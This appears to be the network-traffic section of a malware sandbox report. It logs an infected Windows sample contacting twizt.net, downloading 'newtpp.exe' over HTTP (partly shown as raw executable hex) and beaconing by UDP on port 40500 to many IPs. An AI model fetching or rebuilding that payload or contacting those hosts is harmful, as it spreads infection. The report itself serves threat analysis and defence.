Apr 24, 2024 10:10:17.378951073 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.378966093 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.378984928 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.378989935 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.379025936 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.379475117 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.379492998 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.379548073 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.379597902 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.379601002 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.379618883 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.379642963 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.379652977 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.533427954 CEST	49749	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.714423895 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.714449883 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.714509010 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.714541912 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.714585066 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.714595079 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.714644909 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.714662075 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.714679956 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.714708090 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.714714050 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.714718103 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.714730978 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.714756012 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.714765072 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.714915991 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.714968920 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.715311050 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.715329885 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.715348959 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.715358973 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.715370893 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.715373039 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.715385914 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.715388060 CEST	80	49767	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:17.715415001 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:17.715429068 CEST	49767	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:19.189690113 CEST	49749	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:19.410936117 CEST	49768	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:19.746680975 CEST	80	49768	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:19.749922037 CEST	49768	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:19.750055075 CEST	49768	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:20.087341070 CEST	80	49768	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:20.087399960 CEST	80	49768	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:20.087511063 CEST	49768	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:22.117149115 CEST	49768	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:22.117795944 CEST	49769	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:22.452142000 CEST	80	49768	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:22.452229977 CEST	49768	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:22.452655077 CEST	80	49769	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:22.452721119 CEST	49769	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:22.452941895 CEST	49769	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:22.486531019 CEST	49749	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:22.788069010 CEST	80	49769	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:22.788122892 CEST	80	49769	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:22.788192034 CEST	49769	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:23.502918959 CEST	49770	40500	192.168.2.6	84.53.244.106
Apr 24, 2024 10:10:23.877953053 CEST	40500	49770	84.53.244.106	192.168.2.6
Apr 24, 2024 10:10:24.392793894 CEST	49770	40500	192.168.2.6	84.53.244.106
Apr 24, 2024 10:10:24.816878080 CEST	49769	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:24.817173958 CEST	49771	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:25.150667906 CEST	80	49771	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:25.150751114 CEST	49771	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:25.150958061 CEST	49771	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:25.152224064 CEST	80	49769	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:25.152271032 CEST	49769	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:25.485827923 CEST	80	49771	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:25.485863924 CEST	80	49771	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:25.485954046 CEST	49771	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:26.408399105 CEST	49770	40500	192.168.2.6	84.53.244.106
Apr 24, 2024 10:10:26.783698082 CEST	40500	49770	84.53.244.106	192.168.2.6
Apr 24, 2024 10:10:27.299015045 CEST	49770	40500	192.168.2.6	84.53.244.106
Apr 24, 2024 10:10:27.504146099 CEST	49771	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:27.504456997 CEST	49772	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:27.673505068 CEST	40500	49770	84.53.244.106	192.168.2.6
Apr 24, 2024 10:10:27.838507891 CEST	80	49771	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:27.838721037 CEST	49771	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:27.839391947 CEST	80	49772	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:27.839508057 CEST	49772	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:27.839699984 CEST	49772	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:28.174103975 CEST	49770	40500	192.168.2.6	84.53.244.106
Apr 24, 2024 10:10:28.176989079 CEST	80	49772	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:28.177259922 CEST	80	49772	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:28.177345037 CEST	49772	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:28.545900106 CEST	40500	49770	84.53.244.106	192.168.2.6
Apr 24, 2024 10:10:29.064671040 CEST	49749	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:30.206696033 CEST	49772	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:30.206990004 CEST	49773	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:30.541706085 CEST	80	49772	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:30.541922092 CEST	80	49773	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:30.542040110 CEST	49772	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:30.542076111 CEST	49773	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:30.542294025 CEST	49773	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:30.878544092 CEST	80	49773	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:30.878624916 CEST	80	49773	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:30.878695011 CEST	49773	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:33.535463095 CEST	49774	40500	192.168.2.6	195.158.15.3
Apr 24, 2024 10:10:33.926285028 CEST	49776	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:33.933918953 CEST	40500	49774	195.158.15.3	192.168.2.6
Apr 24, 2024 10:10:34.278112888 CEST	80	49776	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:34.439646959 CEST	49774	40500	192.168.2.6	195.158.15.3
Apr 24, 2024 10:10:34.783411980 CEST	49776	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:34.838155985 CEST	40500	49774	195.158.15.3	192.168.2.6
Apr 24, 2024 10:10:35.129348040 CEST	80	49776	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:35.345901966 CEST	49774	40500	192.168.2.6	195.158.15.3
Apr 24, 2024 10:10:35.642813921 CEST	49776	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:35.744401932 CEST	40500	49774	195.158.15.3	192.168.2.6
Apr 24, 2024 10:10:36.252156973 CEST	49774	40500	192.168.2.6	195.158.15.3
Apr 24, 2024 10:10:36.650219917 CEST	40500	49774	195.158.15.3	192.168.2.6
Apr 24, 2024 10:10:37.158526897 CEST	49774	40500	192.168.2.6	195.158.15.3
Apr 24, 2024 10:10:37.557028055 CEST	40500	49774	195.158.15.3	192.168.2.6
Apr 24, 2024 10:10:39.642795086 CEST	49776	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:39.990310907 CEST	80	49776	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:40.533456087 CEST	49776	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:40.879901886 CEST	80	49776	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:42.345909119 CEST	49749	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:42.910356998 CEST	49777	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:43.159167051 CEST	49778	40500	192.168.2.6	109.122.77.179
Apr 24, 2024 10:10:43.256969929 CEST	80	49777	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:43.846036911 CEST	49777	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:44.174045086 CEST	49778	40500	192.168.2.6	109.122.77.179
Apr 24, 2024 10:10:44.193933964 CEST	80	49777	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:44.845930099 CEST	49777	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:45.192451954 CEST	80	49777	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:45.845954895 CEST	49777	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:46.174226999 CEST	49778	40500	192.168.2.6	109.122.77.179
Apr 24, 2024 10:10:46.193201065 CEST	80	49777	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:46.846034050 CEST	49777	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:47.195589066 CEST	80	49777	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:49.223006010 CEST	49779	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:49.567223072 CEST	80	49779	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:50.049186945 CEST	49773	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:50.080322027 CEST	49779	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:50.189687967 CEST	49778	40500	192.168.2.6	109.122.77.179
Apr 24, 2024 10:10:50.386639118 CEST	80	49773	185.215.113.66	192.168.2.6
Apr 24, 2024 10:10:50.387543917 CEST	49773	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:10:50.424652100 CEST	80	49779	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:50.939701080 CEST	49779	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:51.289083958 CEST	80	49779	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:51.799065113 CEST	49779	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:52.143672943 CEST	80	49779	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:52.658446074 CEST	49779	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:53.003705978 CEST	80	49779	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:55.640635967 CEST	49780	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:55.987492085 CEST	80	49780	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:56.611543894 CEST	49780	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:56.959120035 CEST	80	49780	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:57.611587048 CEST	49780	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:10:57.960896969 CEST	80	49780	91.202.233.141	192.168.2.6
Apr 24, 2024 10:10:58.205302000 CEST	49778	40500	192.168.2.6	109.122.77.179
Apr 24, 2024 10:10:59.754123926 CEST	49781	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:11:00.096895933 CEST	80	49781	91.202.233.141	192.168.2.6
Apr 24, 2024 10:11:00.689667940 CEST	49781	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:11:01.034040928 CEST	80	49781	91.202.233.141	192.168.2.6
Apr 24, 2024 10:11:01.705288887 CEST	49781	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:11:02.047472954 CEST	80	49781	91.202.233.141	192.168.2.6
Apr 24, 2024 10:11:02.564646006 CEST	49781	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:11:02.906980991 CEST	80	49781	91.202.233.141	192.168.2.6
Apr 24, 2024 10:11:03.408396006 CEST	49781	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:11:03.750925064 CEST	80	49781	91.202.233.141	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 10:06:57.287872076 CEST	59936	53	192.168.2.6	1.1.1.1
Apr 24, 2024 10:06:57.460658073 CEST	53	59936	1.1.1.1	192.168.2.6
Apr 24, 2024 10:07:11.867132902 CEST	59141	40500	192.168.2.6	120.237.99.181
Apr 24, 2024 10:07:16.864430904 CEST	59141	40500	192.168.2.6	85.113.19.18
Apr 24, 2024 10:07:21.863770962 CEST	59141	40500	192.168.2.6	5.200.152.6
Apr 24, 2024 10:07:26.909948111 CEST	59141	40500	192.168.2.6	82.114.186.50
Apr 24, 2024 10:07:31.911741972 CEST	59141	40500	192.168.2.6	95.71.69.217
Apr 24, 2024 10:07:36.933234930 CEST	59141	40500	192.168.2.6	95.107.12.43
Apr 24, 2024 10:07:41.942141056 CEST	59141	40500	192.168.2.6	36.20.68.95
Apr 24, 2024 10:07:46.957751989 CEST	59141	40500	192.168.2.6	2.180.157.70
Apr 24, 2024 10:07:51.958250046 CEST	59141	40500	192.168.2.6	186.94.185.219
Apr 24, 2024 10:07:56.957866907 CEST	59141	40500	192.168.2.6	197.148.34.173
Apr 24, 2024 10:08:01.978212118 CEST	59141	40500	192.168.2.6	5.200.190.214
Apr 24, 2024 10:08:06.972796917 CEST	59141	40500	192.168.2.6	5.63.93.62
Apr 24, 2024 10:08:11.988207102 CEST	59141	40500	192.168.2.6	39.53.75.107
Apr 24, 2024 10:08:16.989022970 CEST	59141	40500	192.168.2.6	89.218.235.182
Apr 24, 2024 10:08:22.004023075 CEST	59141	40500	192.168.2.6	95.58.18.206
Apr 24, 2024 10:08:27.019325972 CEST	59141	40500	192.168.2.6	31.186.54.5
Apr 24, 2024 10:08:32.035368919 CEST	59141	40500	192.168.2.6	217.20.222.188
Apr 24, 2024 10:08:38.234849930 CEST	59141	40500	192.168.2.6	134.35.185.171
Apr 24, 2024 10:08:43.222645044 CEST	59141	40500	192.168.2.6	91.234.219.185
Apr 24, 2024 10:08:48.239816904 CEST	59141	40500	192.168.2.6	41.102.227.47
Apr 24, 2024 10:08:53.254441977 CEST	59141	40500	192.168.2.6	134.35.74.170
Apr 24, 2024 10:08:58.253866911 CEST	59141	40500	192.168.2.6	2.185.146.181
Apr 24, 2024 10:09:03.253978014 CEST	59141	40500	192.168.2.6	82.194.11.2
Apr 24, 2024 10:09:08.269597054 CEST	59141	40500	192.168.2.6	95.156.103.50
Apr 24, 2024 10:09:13.269540071 CEST	59141	40500	192.168.2.6	37.20.161.137
Apr 24, 2024 10:09:18.287283897 CEST	59141	40500	192.168.2.6	151.233.73.168
Apr 24, 2024 10:09:23.285104990 CEST	59141	40500	192.168.2.6	89.219.115.32
Apr 24, 2024 10:09:28.285043955 CEST	59141	40500	192.168.2.6	128.65.176.18
Apr 24, 2024 10:09:33.285933018 CEST	59141	40500	192.168.2.6	212.112.112.84
Apr 24, 2024 10:09:38.336082935 CEST	59141	40500	192.168.2.6	185.177.0.227
Apr 24, 2024 10:09:43.348638058 CEST	59141	40500	192.168.2.6	92.47.124.54
Apr 24, 2024 10:09:48.347692013 CEST	59141	40500	192.168.2.6	181.114.188.143
Apr 24, 2024 10:09:53.363436937 CEST	59141	40500	192.168.2.6	89.236.226.70
Apr 24, 2024 10:09:58.363224983 CEST	59141	40500	192.168.2.6	46.35.86.48
Apr 24, 2024 10:10:03.378900051 CEST	59141	40500	192.168.2.6	2.190.224.61
Apr 24, 2024 10:10:08.378882885 CEST	59141	40500	192.168.2.6	105.109.202.176
Apr 24, 2024 10:10:13.394594908 CEST	59141	40500	192.168.2.6	92.46.174.254
Apr 24, 2024 10:10:18.414505959 CEST	59141	40500	192.168.2.6	31.186.49.163
Apr 24, 2024 10:10:23.425986052 CEST	59141	40500	192.168.2.6	5.251.56.144
Apr 24, 2024 10:10:28.442260027 CEST	59141	40500	192.168.2.6	134.35.173.140
Apr 24, 2024 10:10:33.442451000 CEST	59141	40500	192.168.2.6	5.233.222.244
Apr 24, 2024 10:10:38.457098961 CEST	59141	40500	192.168.2.6	151.233.21.215
Apr 24, 2024 10:10:43.459613085 CEST	59141	40500	192.168.2.6	134.35.81.188
Apr 24, 2024 10:10:48.476371050 CEST	59141	40500	192.168.2.6	2.191.221.216
Apr 24, 2024 10:10:53.507363081 CEST	59141	40500	192.168.2.6	189.158.148.85
Apr 24, 2024 10:10:58.504112005 CEST	59141	40500	192.168.2.6	134.35.163.241

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 24, 2024 10:08:38.664313078 CEST	134.35.185.171	192.168.2.6	ffb7	(Port unreachable)	Destination Unreachable
Apr 24, 2024 10:08:48.547014952 CEST	41.102.227.47	192.168.2.6	cc7e	(Port unreachable)	Destination Unreachable
Apr 24, 2024 10:09:28.720215082 CEST	128.65.176.18	192.168.2.6	f03c	(Port unreachable)	Destination Unreachable
Apr 24, 2024 10:09:58.804265976 CEST	46.35.86.48	192.168.2.6	443c	(Port unreachable)	Destination Unreachable
Apr 24, 2024 10:10:08.696899891 CEST	105.109.202.176	192.168.2.6	f406	(Port unreachable)	Destination Unreachable
Apr 24, 2024 10:10:58.943845987 CEST	134.35.163.241	192.168.2.6	e9fd	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 10:06:57.287872076 CEST	192.168.2.6	1.1.1.1	0xa224	Standard query (0)	twizt.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 10:06:57.460658073 CEST	1.1.1.1	192.168.2.6	0xa224	No error (0)	twizt.net		185.215.113.66	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

twizt.net

185.215.113.66

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	185.215.113.66	80	3748	C:\Users\user\Desktop\957C4XK6Lt.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:06:57.806061029 CEST	174	OUT	GET /newtpp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Host: twizt.net
Apr 24, 2024 10:06:58.146378994 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:06:57 GMT Content-Type: application/octet-stream Content-Length: 86016 Last-Modified: Tue, 23 Apr 2024 21:19:33 GMT Connection: keep-alive ETag: "662825e5-15000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d ab 71 6a 29 ca 1f 39 29 ca 1f 39 29 ca 1f 39 20 b2 95 39 2e ca 1f 39 51 b8 1e 38 2b ca 1f 39 ea c5 42 39 2b ca 1f 39 ea c5 40 39 28 ca 1f 39 ea c5 10 39 2b ca 1f 39 0e 0c 72 39 2d ca 1f 39 29 ca 1e 39 e9 ca 1f 39 0e 0c 64 39 3c ca 1f 39 20 b2 9c 39 2d ca 1f 39 20 b2 9b 39 35 ca 1f 39 20 b2 8e 39 28 ca 1f 39 52 69 63 68 29 ca 1f 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cf 25 28 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e6 00 00 00 78 00 00 00 00 00 00 d0 74 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 27 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a e5 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 37 00 00 00 00 01 00 00 38 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 3f 00 00 00 40 01 00 00 2e 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$mqj)9)9)9 9.9Q8+9B9+9@9(99+9r9-9)99d9<9 9-9 959 9(9Rich)9PEL%(fxt@' .textZ `.rdata78@@.data@?@."@
Apr 24, 2024 10:06:58.146421909 CEST	1289	IN	Data Raw: 00 55 8b 6c 24 08 8b 45 20 56 33 f6 57 8b 7c 24 20 85 c0 74 1c 8b 4f 04 39 08 75 0a 66 8b 50 04 66 3b 57 02 74 09 8b 40 1c 85 c0 75 eb eb 02 8b f0 85 f6 75 22 6a 20 e8 95 8f 00 00 8b f0 8b 47 04 89 06 66 8b 4f 02 66 89 4e 04 8b 55 20 89 56 1c 83 Data Ascii: Ul$E V3W\|$ tO9ufPf;Wt@uu"j GfOfNU Vu L$\|$FD$PQtuS$NrdF;wX}xttSW`AuD$$MPSWUNxF;uF+tP9RQA)~[_^]
Apr 24, 2024 10:06:58.146461010 CEST	1289	IN	Data Raw: ff 15 30 02 41 00 6a 01 8d 54 24 28 52 6a 04 66 89 44 24 1a c6 44 24 30 01 8b 46 08 68 ff ff 00 00 50 ff 15 28 02 41 00 8b 56 08 6a 10 8d 4c 24 10 51 52 ff 15 88 02 41 00 83 f8 ff 75 12 56 e8 e4 fd ff ff 83 c4 04 5e 5b 33 c0 5f 83 c4 10 c3 6a 00 Data Ascii: 0AjT$(RjfD$D$0FhP(AVjL$QRAuV^[3_jjVh@jj^AF^[_FS2Ul$;FvNPQFFFT$FWRP~;uF;vu]F[Ft;r+F][+n][
Apr 24, 2024 10:06:58.146500111 CEST	1289	IN	Data Raw: 38 85 ff 74 24 83 bf 60 02 00 00 ff 74 16 8b bf 80 02 00 00 85 ff 75 ed 56 ff 15 04 01 41 00 e9 80 00 00 00 e8 e6 fd ff ff 56 ff 15 04 01 41 00 eb 72 ff d7 2b c6 3d 10 27 00 00 72 67 8d 43 20 50 ff 15 00 01 41 00 8b 73 38 85 f6 74 42 6a 00 8d 56 Data Ascii: 8t$`tuVAVAr+='rgC PAs8tBjVRdAn+r`tP`uC PA8AD$CjPlA_^[]S`AUl$`WjVjD$Pj~WQ
Apr 24, 2024 10:06:58.146538019 CEST	1289	IN	Data Raw: ff 00 00 33 c9 50 c6 87 75 02 00 00 01 66 89 4c 24 3e ff 15 28 02 41 00 8b 8f 60 02 00 00 51 ff 15 2c 02 41 00 c7 87 60 02 00 00 ff ff ff ff 5f 5e 83 c4 1c c3 cc 83 ec 0c 55 8b 2d 2c 00 41 00 56 57 8b 7c 24 1c 6a ff 8d 44 24 14 50 8b 47 08 8d 4c Data Ascii: 3PufL$>(A`Q,A`_^U-,AVW\|$jD$PGL$QT$ 3RPt$(t$ t$$L$;twSu*T$ RT$jD$ P`RPPAu\A\$D$L$VjL$QOT$RD$$3PQt$,t$$t$(L$;u[_^]
Apr 24, 2024 10:06:58.146574974 CEST	1289	IN	Data Raw: 51 6a 0c e8 b5 7d 00 00 83 c4 04 89 45 fc 6a 01 e8 e8 03 00 00 83 c4 04 8b 4d fc 89 01 8b 55 fc 8b 02 c7 00 00 00 00 00 8b 4d fc c7 41 04 00 00 00 00 8b 55 fc c7 42 08 01 00 00 00 8b 45 fc 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b Data Ascii: Qj}EjMUMAUBE]UQEMU:tME8t#MQREQUPDMAUBEQ"U]UEEMQURAEPMQUREQ'
Apr 24, 2024 10:06:58.146612883 CEST	1289	IN	Data Raw: 11 3b 55 e8 73 09 8b 45 f0 83 c0 01 89 45 f0 8b 4d ec 0f af 4d f4 8b 55 08 89 4a 04 8b 45 08 8b 48 04 03 4d f0 8b 55 08 89 4a 04 33 c0 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 30 8b 45 14 25 00 00 00 80 75 1a 8b 4d 0c c7 01 00 00 00 00 8b 55 08 c7 02 Data Ascii: ;UsEEMMUJEHMUJ3]U0E%uMUE%EMMU%EMUEHMUB%EM;MUt&E+EEMMMU;UvEEE
